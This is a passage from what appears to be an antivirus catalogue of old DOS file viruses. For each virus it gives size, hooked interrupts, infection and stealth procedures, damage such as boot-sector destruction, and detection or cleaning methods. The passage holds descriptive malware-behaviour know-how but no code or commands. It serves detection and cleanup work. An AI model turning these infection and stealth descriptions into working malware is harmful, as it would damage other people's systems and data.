  6941. 1) Searches for a COM file in the current directory.
  6942. 2) Checks if the file is infected. If yes, it continues to search.
  6943. 3) If an uninfected file is found, it proceeds to infect it
  6944.    (only infects one file at a time).
  6945.  
  6946. Damage: The part for virus infection was badly written. The
  6947. infected files cannot be executed normally (Furthermore, the
  6948. virus is not able to infect and damage).
  6949.  
  6950. Remarks:
  6951. 1) The virus infects files by INT 21h. When INT 21h is executed,
  6952.    all COM files in the current directory will be infected.
  6953. 2) When infecting files, the virus does not hook INT 24h. Error
  6954.    message will appear when I/O errors occur.
  6955.  
  6956. [Tiny-143]
  6957. Virus Name: Tiny-143
  6958. Virus Type: Memory Resident (OS), File Virus
  6959. Virus Length: Infected COM files increase by 143 bytes
  6960.  
  6961. PC Vectors Hooked:  INT 21h
  6962.  
  6963. Execution Procedure:
  6964. 1) Searches for a COM file in the current directory.
  6965. 2) Checks if the file is infected. If yes, it continues to search.
  6966. 3) If an uninfected file is found, it proceeds to infect it
  6967.    (only infects one file at a time).
  6968.  
  6969. Damage: None
  6970.  
  6971. Detection method:
  6972. 1) Date and time fields of infected files are changed.
  6973. 2) Infected files increase by 143 bytes.
  6974.  
  6975. [Smal-122B]
  6976. Virus Name: Smal-122B
  6977. Virus Type: Memory Resident(OS), File Virus
  6978. Virus Length: Infected COM and EXE files increase by 122 bytes.
  6979.  
  6980. PC Vectors Hooked:  INT 21h
  6981.  
  6982. Execution Procedure: Checks whether it resides in the memory. If not,
  6983. the virus copies itself to absolute address 0000:0103h. Then hooks
  6984. INT21h and goes back to the original routine. If the program to be
  6985. executed is an uninfected COM or EXE file and its first byte is
  6986. not E9h, the virus proceeds to infect it.
  6987.  
  6988. Damage: EXE files are destroyed because of the subsequent head
  6989. damage.
  6990.  
  6991. Note: Some interrupts cannot run correctly because the virus has
  6992. stayed resident in the vector area.
  6993.  
  6994. Detection method:
  6995. 1) Date and time fields of infected files are changed.
  6996. 2) Infected files increase by 122 bytes.
  6997.  
  6998. [Printmon]
  6999. Virus Name: Printmon
  7000. Virus Type: File Virus
  7001. Virus Length: Infected COM files increase by 853 bytes.
  7002.  
  7003. PC Vectors Hooked:  INT 17h (printing function) to change
  7004.                     print data.
  7005.  
  7006. Execution Procedure: Checks whether it has hooked INT 17h. If
  7007. not, virus makes some procedure of INT 17h to stay resident in
  7008. the memory. Then proceeds to infect all uninfected COM files with
  7009. length less than 64000 bytes on te current directory and goes back
  7010. to the original routine (During the infection period, it hangs INT
  7011. 24h to prevent divulging its trace when writing).
  7012.  
  7013. Damage: The virus will cause some errors in the printed out data.
  7014.  
  7015. Note:  Date and time fields of infected files are not change.
  7016.  
  7017. Detection method: Infected files will increase by 853 bytes.
  7018.  
  7019. [Tiny-124]
  7020. Virus Name: Tiny-124
  7021. Virus Type: Memory Resident(OS), File Virus
  7022. Virus Length:  Infected COM files increase by 124 bytes.
  7023.  
  7024. PC Vectors Hooked:  INT 21h
  7025.  
  7026. Execution Procedure: Checks whether it resides in the memory. If not,
  7027. the virus copies itself to absolute address 0050:0103h. Then hooks
  7028. INT21h and goes back to the original routine.
  7029.  
  7030. Infection Procedure: If the program to be executed is an uninfected
  7031. COM file and its first byte is not E9h, the virus proceeds to infect
  7032. it.
  7033.  
  7034. Damage: COM files are destroyed because of the subsequent head
  7035. damage.
  7036.  
  7037. Note: Some interrupts cannot run correctly because the virus has
  7038. stayed resident in the vector area.
  7039.  
  7040. Detection method:
  7041. 1) Date and time fields of infected files are changed.
  7042. 2) Infected files increase by 124 bytes.
  7043.  
  7044. [Smal-124]
  7045. Virus Name: Smal-124
  7046. Virus Type: Memory Resident(OS), File Virus
  7047. Virus Length: Infected COM files increase by 124 bytes
  7048.  
  7049. PC Vectors Hooked:  INT 21h
  7050.  
  7051. Execution Procedure: Checks whether it is residing in the memory. If
  7052. not, it copies itself to absolute address  0050:0103h. Then hooks
  7053. INT21h and goes back to the original routine.
  7054.  
  7055. Infection Procedure: If the program to be executed is an
  7056. uninfected COM file, the virus proceeds to infect it.
  7057.  
  7058. Damage: None
  7059.  
  7060. Note: Some interrupts cannot run correctly because the virus has
  7061. stayed resident in the vector area.
  7062.  
  7063. Detection method:
  7064. 1) Date and time fields of infected files are changed.
  7065. 2) Infected files increase by 124 bytes.
  7066.  
  7067. [Troi2]
  7068. Virus Name: Troi2
  7069. Virus Type: Memory Resident(OS), File Virus
  7070. Virus Length: Infected EXE files increase by 512 bytes.
  7071.  
  7072. PC Vectors Hooked:  INT 21h
  7073.  
  7074. Execution Procedure: Checks whether the current date is before
  7075. 5/1/1992. If it is, it returns to the original routine directly.
  7076. Otherwise, checks whether it is residing in the memory. If not,
  7077. the virus copies itself to absolute address 0000:0200h (The area
  7078. for interrupts vectors), hooks INT 21h and goes back to the original
  7079. routine.
  7080.  
  7081. Infection Procedure:
  7082. 1) Hooks INT 21h to check whether it is residing in the memory.
  7083. 2) Hooks INT 21H (AH=4Bh) to infect files. If the program to be
  7084.    executed is an uninfected EXE file, the virus proceeds to infect
  7085.    it.
  7086.  
  7087. Damage: None
  7088.  
  7089. Note: Date and time fields of infected files are not change.
  7090.  
  7091. Detection method: Infected files increase by 512 bytes.
  7092.  
  7093. [Tver]
  7094. Virus Name: Tver
  7095. Virus Type: Memory Resident(OS), File Virus
  7096. Virus Length: Infected COM files increase by 308 bytes.
  7097.  
  7098. PC Vectors Hooked:  INT 21h
  7099.  
  7100. Execution Procedure:
  7101. Checks whether it is residing in the memory. If not, the virus
  7102. copies itself to absolute address 0000:0200h (the area for interrupt
  7103. vectors), hooks INT 21h and goes back to the original routine.
  7104.  
  7105. Infection Procedure:
  7106. 1) Hooks INT 21h to check whether it is residing in the memory.
  7107. 2) Hooks INT 21H (AH=4Bh) to infect files. If the program to be
  7108.    executed is an uninfected COM file and its first byte is E9h,
  7109.    the virus proceeds to infect it.
  7110.  
  7111. Damage: None
  7112.  
  7113. Note: Many virus files' first byte is E9h. In most cases, the virus
  7114. corrects the files' first byte if it is not E9h.
  7115.  
  7116. Detection method:
  7117. 1) Date and time fields of infected files are changed.
  7118. 2) Infected files increase by 308 bytes.
  7119.  
  7120. [Wave]
  7121. Virus Name: Wave
  7122. Virus Type: Memory Resident(OS), File Virus
  7123. Virus Length: Infected COM files increase by 454 bytes.
  7124.  
  7125. PC Vectors Hooked:  INT 21h, 1Ch
  7126.  
  7127. Execution Procedure: Checks whether it is residing in the memory. If
  7128. not, the virus copies itself to absolute address 0000:01ECh (the area
  7129. for interrupt vectors), hooks INT 21h and INT 1Ch, changes the
  7130. pointer of INT 78h to the address pointed by the original INT
  7131. 21h. Then goes back to the original routine.
  7132.  
  7133. Infection Procedure:
  7134. INT 21h:
  7135. 1) Hooks INT 21h to check whether it remains in the memory.
  7136. 2) Hooks INT 21h (AH=4Bh,AH=3Dh) to infect files. If the program
  7137.    to be executed is an uninfected COM, and the combined length of
  7138.    the program and the virus is between 1500 and 64000 bytes and it
  7139.    is on C drive (except A and B drive), then the virus will proceed to
  7140.    infect. Otherwise, it will set a flag to be used by INT 1Ch at
  7141.    a later time.
  7142. INT 1Ch: Hooks INT 1Ch to shake the screen from side to side for 33
  7143. seconds after the flag is set by INT 21h.
  7144.  
  7145. Damage: None
  7146.  
  7147. Note: Time and date (except year) of infected files are not
  7148. changed. You cannot see the change when you use the "Dir" command
  7149. because the last two bytes of the data are not changed (You would
  7150. see some problems on arrangement order if you attach "/od" to the
  7151. "Dir" command).
  7152.  
  7153. Detection method: Infected files increase by 454 bytes.
  7154.  
  7155. [Zz1]
  7156. Virus Name: Zz1
  7157. Virus Type: Overwrite, File Virus (COM files)
  7158. Virus Length: 127 bytes
  7159.  
  7160. Execution Procedure: Searches for an uninfected COM file on the
  7161. current directory and infects it (only infects one file at a
  7162. time). If there is no file to infect, it changes data in the
  7163. system RAM to set the screen lines to 81. This confuses the screen.
  7164.  
  7165. Damage:
  7166. 1) It overwrites the first 127 bytes of the original files with the
  7167.    virus code. Original files are destroyed.
  7168. 2) Confuses the screen if there are no infectable files.
  7169.  
  7170. Note: Date and time fields of infected files are not changed.
  7171.  
  7172. [Willow]
  7173. Virus Name: Willow
  7174. Virus Type: Memory Resident, File Virus (EXE files)
  7175. Virus Length:  1870 bytes
  7176.  
  7177. PC Vectors Hooked:  INT 21h
  7178.  
  7179. Execution Procedure: Checks whether it has remained in the
  7180. memory. If not, hooks INT 14h first, then changes the pointer of
  7181. INT FDh to the address that is pointed by INT 21h. Then hooks INT
  7182. 21h. Lastly, after all memory is released, gets the name of the
  7183. Shell executed by the system from the environment parameter. Executes
  7184. this Shell again. Terminates upon reloading itself memory resident.
  7185.  
  7186. Infection Procedure:
  7187. 1) Hooks INT 21h to check whether it has stayed resident in memory.
  7188. 2) Hooks INT 21h(AH=4Bh) to infect files. If the program to be
  7189.    executed is a COM file, the virus deletes it. If it is an EXE file,
  7190.    the virus proceeds to infect it.
  7191.  
  7192. Damage: It deletes COM files executed while the virus is memory
  7193. resident.
  7194.  
  7195. Note: Date and time fields of infected files are not changed.
  7196.  
  7197. Detection method: Infected files increase by 1870-1885 bytes.
  7198.  
  7199. [V-66]
  7200. Virus Name: V-66
  7201. Virus Type: Overwrites, File Virus (all files)
  7202. Virus Length:  66 bytes
  7203.  
  7204. Execution Procedure: Infects all files in the current directory.
  7205.  
  7206. Infection Procedure: Changes the files' attributes, making them
  7207. writable. Proceeds to overwrite the first 66 bytes with the virus
  7208. code.
  7209.  
  7210. Damage: It overwrites the original files with the virus code.
  7211. Original files are destroyed (corrupted).
  7212.  
  7213. Detection method: Date and time fields of infected files are changed.
  7214.  
  7215. [VCL-408]
  7216. Virus Name: VCL408
  7217. Virus Type: Overwrites, File Virus (EXE and COM files)
  7218. Virus Length:  408 bytes
  7219.  
  7220. Execution Procedure: Searches for one uninfected COM or EXE file
  7221. on each directory and infects it. Virus records whether the initial
  7222. infection is successful or not. Subsequent record will overwrite the
  7223. original. Last record is record of last infection. The virus checks
  7224. this record before terminating. If the record fails, the virus halts
  7225. the system.
  7226.  
  7227. Damage:
  7228. 1) Files are corrupted after becoming infected.
  7229. 2) Halts system on occasion.
  7230.  
  7231. Note:
  7232. 1) Date and time fields of infected files are not changed.
  7233. 2) Length of infected files does not change unless the length of
  7234.    original files is less than 408. If so, the length of infected
  7235.    files becomes 408 bytes.
  7236.  
  7237. [SUNDEVIL]
  7238. Virus Name: SunDevil
  7239. Virus Type: File Virus (COM files)
  7240. Virus Length:  691 bytes
  7241.  
  7242. PC Vectors Hooked:  INT 21h
  7243.  
  7244. Execution Procedure: Checks whether the current date is May 8. If it
  7245. is, it destroys the first sector (Boot sector) on the current diskette.
  7246. Then it displays the following message and repeats call INT 05h.
  7247.  
  7248.     "There is no America. There is no Democracy.
  7249.      There is only IBM, ITT, and AT&T.
  7250.      This virus is dedicated to all that have been
  7251.      busted for computer-hacking activities.
  7252.      The SunDevil Virus (C) 1993 by Crypt Keepr
  7253.      [SUNDEVIL] "
  7254.  
  7255. Otherwise, the virus copies itself to absolute address 9000:0000h.
  7256. Then hooks INT21h and returns to the original routine.
  7257.  
  7258. Infection Procedure: Hooks INT 21h (AH=3D,3E,56, AX=4300,4B00,4B01) to
  7259. infect files. If the program to be executed is an uninfected COM
  7260. file, the virus proceeds to infect it.
  7261.  
  7262. Damage: It destroys the boot sector of the current diskette if the
  7263. current date is May 8.
  7264.  
  7265. Note: Date and time fields of infected files are not changed.
  7266.  
  7267. Detection method:
  7268. 1) Infected files increase by 691 bytes.
  7269. 2) Above message will appear when you use the "Type" command.
  7270.  
  7271. [Skew-469]
  7272. Virus Name: Skew-469
  7273. Virus Type: Memory Resident(OS), File Virus (EXE files)
  7274. Virus Length:  469 bytes
  7275.  
  7276. PC Vectors Hooked:  INT 21h, INT 1Ch
  7277.  
  7278. Execution Procedure: Checks whether it resides in the memory. If
  7279. not, it copies itself to absolute address 0000:0200h, then hooks
  7280. INT21h and goes back to the original routine.
  7281.  
  7282. Infection Procedure:
  7283. 1) Hooks INT 21h (AX=4B00h or AH=3Dh) to infect files. First,
  7284.    it hangs INT 24h to prevent divulging its trace when writing.
  7285.    Then it checks whether the program to be executed is an
  7286.    uninfected EXE file. If it is, it proceeds to infect it. Finally,
  7287.    it restores INT 24h.
  7288. 2) Hooks INT 1Ch. Increases the value of an address by 1 everytime
  7289.    this interrupt is called. When the value equals FFFFh, the virus
  7290.    writes the current value to the video card making the screen move
  7291.    up or down or from side to side.
  7292.  
  7293. Damage: Causes the screen to move up to down or from side to side.
  7294.  
  7295. Detection method:
  7296. 1) Date and time fields of infected files are changed.
  7297. 2) Infected files increase by 469-469+15 bytes.
  7298.  
  7299. [Atas_400]
  7300. Virus Name: Atas_400
  7301. Virus Type: File Virus (COM files)
  7302. Virus Length:  400 bytes
  7303.  
  7304. PC Vectors Hooked:  INT 24h (nullifies the function for dealing with
  7305.                     severe errors)
  7306.  
  7307. Execution Procedure:
  7308. 1) The virus decodes, hangs INT24h to prevent divulging its trace
  7309.    when writing, then it changes its head.
  7310. 2) Searches for an uninfected COM file that is larger than 255 bytes
  7311.    but less than 64256 bytes.
  7312. 3) Checks the system date. If the Seconds field is less than 3, it
  7313.    displays the following message:
  7314.  
  7315.     "I like to travel ...".
  7316.  
  7317.    Then restores INT 24h and goes back to the original routine.
  7318.  
  7319. Damage: None
  7320.  
  7321. Note:
  7322. 1) Only infects one file at a time.
  7323. 2) Date and time fields of infected files are changed.
  7324.  
  7325. [DM-330]
  7326. Virus Name: Dm-330
  7327. Virus Type: Memory Resident, File Virus (COM files)
  7328. Virus Length:  330 bytes
  7329.  
  7330. PC Vectors Hooked:  INT 21h, 5Fh
  7331.  
  7332. Execution Procedure:
  7333. 1) The virus decodes, then checks whether it has stayed resident
  7334.     in the memory. If not, it moves itself to absolute address
  7335.     from 0000:0208h to 0000:0351h.
  7336. 2) Hooks INT21h and goes back to the original routine.
  7337.  
  7338. Infection Procedure:
  7339. 1) Hooks INT 5Fh. Points to the address pointed by the original
  7340.     INT 21h.
  7341. 2) Hooks INT 21h to infect files. Virus activates when the system
  7342.     calls INT 21h to execute a program (AH=4Bh), changes file's
  7343.     attribute (AH=43h), changes file name (AH=56h), or opens a file
  7344.     (AH=3Dh). The virus checks whether the program to be executed is an
  7345.     uninfected COM file. If it is, the virus infects it.
  7346.  
  7347. Damage: None
  7348.  
  7349. Note:
  7350. 1) The virus stays in the area for interrupt vectors. This causes
  7351.     a conflict in the virus routine and the interrupts vectors
  7352.     (address from 0000:0208h to 0000:0351h).
  7353. 2) Date and time fields of infected files are not changed.
  7354.  
  7355. [CLS]
  7356. Virus Name: Cls
  7357. Virus Type: Memory Resident, File Virus (COM and EXE files)
  7358. Virus Length:  835 bytes
  7359.  
  7360. PC Vectors Hooked:  INT 21h, INT 08h, INT 13h
  7361.  
  7362. Execution Procedure:
  7363. 1) Checks whether it has stayed resident in the memory. If not,
  7364.    it moves itself to high memory.
  7365. 2) Hooks INT 21h, INT 08h and INT 13h and goes back to the
  7366.    original routine.
  7367.  
  7368. Infection Procedure:
  7369. INT 21h:
  7370. 1) Hooks INT21h to check whether it has stayed resident in the
  7371.    memory.
  7372. 2) Hooks INT21h to infect files. Virus activates when the system
  7373.    calls INT21h to execute a program (AH=4Bh). It checks whether
  7374.    the program to be executed is an uninfected COM file and its
  7375.    length is between 129 bytes and 64512 bytes. If it is, the
  7376.    virus infects it.
  7377.  
  7378. INT 08h: Hooks INT 08h (Time interrupt, executed once every 1/18
  7379. second). Every time this interrupt executes, a counter increments
  7380. by 1. When this counter reaches 65520 (about an hour later), the virus
  7381. cleans the screen (It has no effect on monochrome because the cleaning
  7382. function writes 00 from B800:0000h to B800:0FA0h).
  7383.  
  7384. INT 13h: Hooks INT 13h (virus writing assistance).
  7385.  
  7386. Damage: The virus cleans the screen once every hour.
  7387.  
  7388. Note: Date and time fields of infected files are not changed.
  7389.  
  7390. Detection method: Infected files increase by 853 bytes.
  7391.  
  7392. [Nouin]
  7393. Virus Name: Nouin
  7394. Virus Type: Memory Resident, File Virus (COM and EXE files)
  7395. Virus Length:  855 bytes
  7396.  
  7397. PC Vectors Hooked:  INT 83h, 09h, 21h
  7398.  
  7399. Execution Procedure:
  7400. 1) Checks whether it has stayed resident in the memory. If not,
  7401.    it loads itself to high memory.
  7402. 2) Hooks INT 21h, INT 09h and INT 83h and goes back to the original
  7403.    routine. (The method the virus uses to load itself to memory is
  7404.    fairly crude. It needs the last MCB controlled by DOS in the
  7405.    address when loading the executed program).
  7406.  
  7407. Infection Procedure:
  7408. 1) Hooks INT 83h to store a word for reporting whether the virus
  7409.    has stayed resident in the memory or not.
  7410. 2) Hooks INT 09h to decrement a counter by 1 every time a key is
  7411.    pressed. Sets the damage_flag when the value reaches zero.
  7412. 3) Hooks INT 21h (AH=3Dh,aH=43h,AX=4B00h). It checks whether
  7413.    the program to be executed is an uninfected EXE or COM file
  7414.    (it skips SCAN.EXE and CLEAN.EXE). If it is a COM file, the virus
  7415.    checks whether or not the file is larger than 60000. If it is, the
  7416.    virus infects it. Then it checks if the damage_flag is set. If
  7417.    it is, the virus checks if the current date is between November 11
  7418.    and 30. If it is, the virus destroys sectors 1 to 9 on the current
  7419.    diskette.
  7420.  
  7421. Damage: After the virus has stayed resident in the memory, and
  7422. the number of times the keyboard has been struck is equal to a certain
  7423. value, or the current date is between November 11 and 30, it will
  7424. destroy sectors 1 to 9 on the current diskette.
  7425.  
  7426. Note: Date and time fields of infected files are not changed.
  7427.  
  7428. Detection method: Infected files increase by 855 bytes.
  7429.  
  7430. [V-550]
  7431. Virus Name: V-550
  7432. Virus Type: Memory Resident, File Virus (EXE files)
  7433. Virus Length:  550 bytes
  7434.  
  7435. PC Vectors Hooked:  INT 21h
  7436.  
  7437. Execution Procedure:
  7438. 1) The virus checks whether it has stayed resident in
  7439.    the memory, and the block of memory which loads the current program
  7440.    is the last MCB. If it is, it moves itself to high memory.
  7441. 2) Hooks INT21h and goes back to the original routine.
  7442.  
  7443. Infection Procedure:
  7444. 1) Hooks INT 21h to check whether it has stayed resident in the memory.
  7445. 2) Hooks INT 21h to check whether the program to be executed is an
  7446.    uninfected EXE file. If it is, the virus infects it.
  7447.  
  7448. Damage: None
  7449.  
  7450. Detection method:
  7451. 1) Date and time fields of infected files are changed.
  7452. 2) Infected files increase by about 550 bytes.
  7453. 3) The total memory decreases by 39 pares after the virus has stayed
  7454.    resident in the memory.
  7455.  
  7456. [Angarsk]
  7457. Virus Name: Angarsk
  7458. Virus Type: File Virus (COM files)
  7459. Virus Length:  238 bytes
  7460.  
  7461. Execution Procedure: Searches for all uninfected COM files on
  7462. the current and root directories and infects them (length
  7463. of infectable files must be less than 32768 bytes).
  7464.  
  7465. Damage: None
  7466.  
  7467. Detection method:
  7468. 1) Date and time fields of infected files are changed.
  7469. 2) Infected files increase by about 238 bytes.
  7470.  
  7471. [Enet-613]
  7472. Virus Name: Enet-613
  7473. Virus Type: File Virus (COM files)
  7474. Virus Length:  613 bytes
  7475.  
  7476. Execution Procedure:
  7477. 1) Infects all COM files on the current directory (It does not infect
  7478.    the same file again).
  7479. 2) Checks whether the current day is Sunday. If it is, it displays a
  7480.    message and waits until a key is pressed.
  7481. 3) Changes the word at address 4000:0013h of RAM to 0200h.
  7482. 4) Calls INT 19h to reboot the system.
  7483.  
  7484. Damage: None
  7485.  
  7486. Note:
  7487. 1) Date and time fields of infected files are not changed.
  7488. 2) Infected files increase from 613-628 bytes.
  7489.  
  7490. [Fri-13D]
  7491. Virus Name: Fri-13-D
  7492. Virus Type: File Virus (COM files)
  7493. Virus Length:  416 bytes
  7494.  
  7495. Execution Procedure:
  7496. 1) When an infected program is executed, it will infect all COM
  7497.    files (except COMMAND.COM) on the current directory (it does
  7498.    not infect the same file again).
  7499. 2) Checks whether the current day is Friday the 13th. If it is,
  7500.    it deletes itself and then goes back to the original routine.
  7501.  
  7502. Damage: An infected program will delete itself if you run it
  7503. on Friday the 13th.
  7504.  
  7505. Detection method:
  7506. 1) Date and time fields of infected files are changed.
  7507. 2) Infected files increase from 416-431 bytes.
  7508.  
  7509. [Ash]
  7510. Virus Name: Ash
  7511. Virus Type: File Virus (COM files)
  7512. Virus Length:  280 bytes
  7513.  
  7514. Execution Procedure: Infects all infectable COM files on the current
  7515. directory (It does not infect the same file again, and does not
  7516. infect files larger than 64768). If the number of newly infected files
  7517. is less than 2, it will search for infectable files on its father and
  7518. father's father directory.
  7519.  
  7520. Damage: None
  7521.  
  7522. Detection Method:
  7523. 1) Date and time fields of infected files are changed.
  7524. 2) Infected files increase by 280 bytes.
  7525.  
  7526. [Bljec-1]
  7527. Virus Name: Bljec-1
  7528. Virus Type: File Virus (COM files)
  7529. Virus Length:  301 bytes
  7530.  
  7531. Execution Procedure: Checks whether the current month is September.
  7532. If it is, it will format the first 16 sectors of the current diskette,
  7533. then infects all COM files on the current directory.
  7534.  
  7535. Damage: Formats the first 16 sectors of the current diskette if the
  7536. current month is September.
  7537.  
  7538. Detection Method:
  7539. 1) Date and time fields of infected files are not changed.
  7540. 2) Infected files increase by 301 bytes.
  7541.  
  7542. [Cas-927]
  7543. Virus Name: Cas-927
  7544. Virus Type: Memory Resident(HiMem), File Virus (COM files)
  7545. Virus Length:  3+927 bytes
  7546.  
  7547. PC Vectors Hooked:  INT 21h, 1Ch, 28h
  7548.  
  7549. Execution Procedure:
  7550. 1) The virus decodes.
  7551. 2) Checks whether it has stayed resident in the memory. If not,
  7552.    it loads itself resident in the high memory.
  7553. 3) Hooks INT 21h, INT 1Ch and INT 28h and goes back to the original
  7554.    routine.
  7555.  
  7556. Infection Procedure:
  7557. INT 21h:
  7558. 1) Hooks INT 21h to check whether it has stayed resident in
  7559.    the memory.
  7560. 2) Hooks INT 21h(AX=4B00h) to infect files. If the program to be
  7561.    executed is an uninfected COM file and its length is not
  7562.    larger than 63500 bytes, the virus infects it.
  7563.  
  7564. INT 28h:
  7565. Hooks INT 28h to check whether the current month is an even month,
  7566. current day is Sunday, Tuesday, Thursday, or Saturday, and
  7567. current time is 11:11:11. If all these conditions are satisfied, it
  7568. sets a damage_flag to be used later by INT 1Ch.
  7569.  
  7570. INT 1Ch:
  7571. Hooks INT 1Ch to cooperate with INT 28h. If the damage_flag is set,
  7572. it changes all uppercase characters on the screen to lowercase.
  7573.  
  7574. Damage: None
  7575.  
  7576. Note:
  7577. 1) The virus stays resident in the high memory (it uses 7A pares).
  7578. 2) Infected files increase by 855 bytes.
  7579. 3) Date and time fields of infected files are not changed.
  7580.  
  7581. [CSFK]
  7582. Virus Name: Csfk
  7583. Virus Type: Memory Resident(MCB), File Virus (COM files)
  7584. Virus Length:  5+918 bytes
  7585.  
  7586. PC Vectors Hooked:  INT 21h
  7587.  
  7588. Execution Procedure:
  7589. 1) The virus decodes.
  7590. 2) Checks whether it has stayed resident in the memory. If not, it
  7591.    loads itself memory resident.
  7592. 3) Hooks INT 21h and goes back to the original routine.
  7593.  
  7594. Infection Procedure:
  7595. 1) Hooks INT 21h to check whether it has stayed resident in
  7596.    the memory.
  7597. 2) Hooks INT 21(AH=4Bh) to infect files. If the program to be
  7598.    executed is an uninfected COM file and its length is between
  7599.    25 bytes and 63500 bytes, the virus infects it.
  7600.  
  7601. Damage: None
  7602.  
  7603. Note:
  7604. 1) The virus stays resident in the memory (MCB) (it uses 6A pares).
  7605. 2) Infected files increase by 918 bytes.
  7606. 3) Date and time fields of infected files are not changed.
  7607.  
  7608. [Warrier1]
  7609. Virus Name: Warrier1
  7610. Virus Type: Memory Resident(HiMem), File Virus (COM files)
  7611. Virus Length: 300 bytes
  7612. PC Vectors Hooked:  INT 21h
  7613.  
  7614. Execution Procedure:
  7615. 1) The virus decodes.
  7616. 2) Checks whether it has stayed resident in the memory. If not, it
  7617.     loads itself memory resident.
  7618. 3) Hooks INT21h and goes back to the original routine.
  7619.  
  7620. Infection Procedure: Hooks INT 21h(AX=4B00h) to infect files. If the
  7621. program to be executed is an uninfected COM file (except
  7622. COMMAND.COM), the virus infects it.
  7623.  
  7624. Damage: None
  7625.  
  7626. Note:
  7627. 1) The virus stays resident in the high memory (it uses 61 pares).
  7628. 2) Date and time fields of infected files are not changed.
  7629. 3) The change in the infected file's length varies depending on the
  7630.     following:
  7631.     i) If the original file is not larger than 768 bytes, its
  7632.         infected version will be 1536 bytes long.
  7633.    ii) If the original file is larger than 768 bytes, its infected
  7634.         version will increase by 768 bytes.
  7635.  
  7636. Cleaning Method: Delete the first 768 bytes from infected files.
  7637.  
  7638. [Athens]
  7639. Virus Name: Athens
  7640. Virus Type: Memory Resident(HiMem), File Virus (COM and EXE files)
  7641. Virus Length: 1,463 bytes
  7642.  
  7643. PC Vectors Hooked:  INT 21h
  7644.  
  7645. Execution Procedure:
  7646. 1) The virus decodes.
  7647. 2) Checks whether it has stayed resident in the memory. If not, it
  7648.     loads itself resident in the high memory.
  7649. 3) Hooks INT21h and goes back to the original routine.
  7650.  
  7651. Infection Procedure:
  7652. 1) Hooks INT 21h to check whether it has stayed resident in
  7653.     the memory.
  7654. 2) Hooks INT 21h(AX=4B00h) to infect files. If the program to be
  7655.     executed is an uninfected EXE or COM (except COMMAND.COM)
  7656.     file, the virus infects it.
  7657. 3) Hooks INT 21h (AX=4Eh,4Fh,11h,12h) to check
  7658.     whether the current program has been infected. If it is, the
  7659.     virus changes the file's length and date in DTA to their original
  7660.     data. This prevents users from noticing the change in the length
  7661.     and date of infected files while the virus is memory resident.
  7662.  
  7663. Damage: None
  7664.  
  7665. Note:
  7666. 1) The virus stays resident in the high memory (it uses DFh pares).
  7667. 2) Infected files increase by 1463 bytes. You can not see
  7668.     the increase while the virus is memory resident.
  7669. 3) Date and time fields of infected files are changed. You can not
  7670.     see this while the virus is memory resident.
  7671.  
  7672. [Commy]
  7673. Virus Name: Commy
  7674. Virus Type: File Virus (COM files)
  7675. Virus Length:  998 bytes
  7676.  
  7677. Execution Procedure:
  7678. 1) The virus decodes.
  7679. 2) Checks whether the current minute is less than 10, and the current
  7680.     DOS version is above 3.0. If all these conditions are satisfied,
  7681.     it will search for a COM file with length between 4567 bytes and
  7682.     64520 bytes, and infects it (the virus infects one file at a time).
  7683. 3) It goes back to the original routine.
  7684.  
  7685. The search path is the value specified by PATH. When the virus infects
  7686. a file, it encodes the file's time to verify it is infected.
  7687.  
  7688. Damage: None
  7689.  
  7690. Note:
  7691. 1) Infected files increase by 998 bytes.
  7692. 2) The dates of infected files are not changed.
  7693. 3) The time fields of infected files are changed due to the encoding.
  7694.  
  7695. [Arriba]
  7696. Virus Name: Arriba
  7697. Virus Type: Memory resident, File Virus (COM and EXE files)
  7698. Virus Length: 1,590 bytes
  7699.  
  7700. PC Vectors Hooked:  INT 21h, INT 08h
  7701.  
  7702. Execution Procedure:
  7703. 1) Checks whether it has stayed resident in the memory. If it has,
  7704.     it will go back to the original routine directly. Otherwise, it
  7705.     will move itself to high memory.
  7706. 2) Hooks INT21h and checks whether the current date is November 20. If
  7707.     it is, it hooks INT 08h and goes back to the original routine.
  7708.  
  7709. Infection Procedure: Hooks INT 08h to display a message and then halt
  7710. the system. Hooks INT 21h(AX=4B00) to check whether the program being
  7711. executed is infected. If not, the virus will infect it in
  7712. different ways according to its type: if it is a COM file, it
  7713. will write the virus code at the beginning of the original file,
  7714. followed by the original file's code, and attach two bytes of
  7715. identified code at the end of the file to verify that this file is
  7716. already infected; if it is an EXE file, it will attach the virus code
  7717. at the end of the original file's code, then change the head of file
  7718. and attach the identified code at the end.
  7719.  
  7720. Damage: Halts the system when INT 08h is called.
  7721.  
  7722. Note:
  7723. 1) The date and time fields of infected files are not changed.
  7724. 2) The method the virus uses to move the code is special. First, it
  7725.     tests whether the address A0000h is writable. If not, it moves 1000
  7726.     bytes of this area to a lower address repeatedly until it finds a
  7727.     writable area. Then it moves the virus codes into this area. You
  7728.     will not notice the changes in the memory by MEM program because
  7729.     it has not changed the size of the memory blocks. This method may
  7730.     cause damage to the virus code, and may even halt the system.
  7731.  
  7732. Detection method: Infected files increase by 1590 bytes.
  7733.  
  7734. [Ekoterror]
  7735. Virus Name: Ekoterror
  7736. Virus Type: Memory Resident(HiMem), File Virus, Partition Virus
  7737. Virus Length: 2,048 bytes
  7738. PC Vectors Hooked:  INT 08h, 13h, 21h
  7739.  
  7740. Execution Procedure:
  7741. 1) When an infected program is executed, the virus writes its viral
  7742.     code to the Partition. The virus will not check whether the
  7743.     Partition is already infected or not, thus executing an infected
  7744.     file several times will delete all data in the Partition.
  7745. 2) Hooks INT 08h, INT 13h, and call INT 08h to check whether DOS has
  7746.     been loaded. If it has, it hooks INT 21h.
  7747.  
  7748. Infection Procedure: Hooks INT 08h to check whether DOS has been
  7749. loaded. If it has, it hooks INT 21h.
  7750. Hooks INT 13h to check whether the sector loaded is the Partition. If
  7751. it is, it will revert back or change the data of the original
  7752. Partition.
  7753. Hooks INT 21h to infect COM files when reading or writing files.
  7754.  
  7755. Damage: The virus deletes the data in the Partition after executing
  7756. an infected file several times.
  7757.  
  7758. Note:
  7759. 1) If the virus has invaded the Partition, you will not be able to
  7760.     load or save data onto the hard disk if you booted the system
  7761.     from a diskette. This is because the data in the Partition has
  7762.     already changed.
  7763. 2) If the DOS version is not suitable, or the INT 08h code does not
  7764.     conform to the DOS loading process, the virus can not hook INT 21.
  7765.     This prevents the virus from infecting files.
  7766.  
  7767. Cleaning Method: Boot up from an uninfected diskette. Then use a
  7768. program that can read or write data on the hard disk (like Debug) to
  7769. write the data of the original Partition back (The virus moves the
  7770. data of the original Partition to 0 side, 0 track, 5 sector. Every
  7771. time it is infected, it will add 4 to the number of sectors).
  7772.  
  7773. [AST-976]
  7774. Virus Name: Ast-976
  7775. Virus Type: Memory Resident, File Virus (COM files)
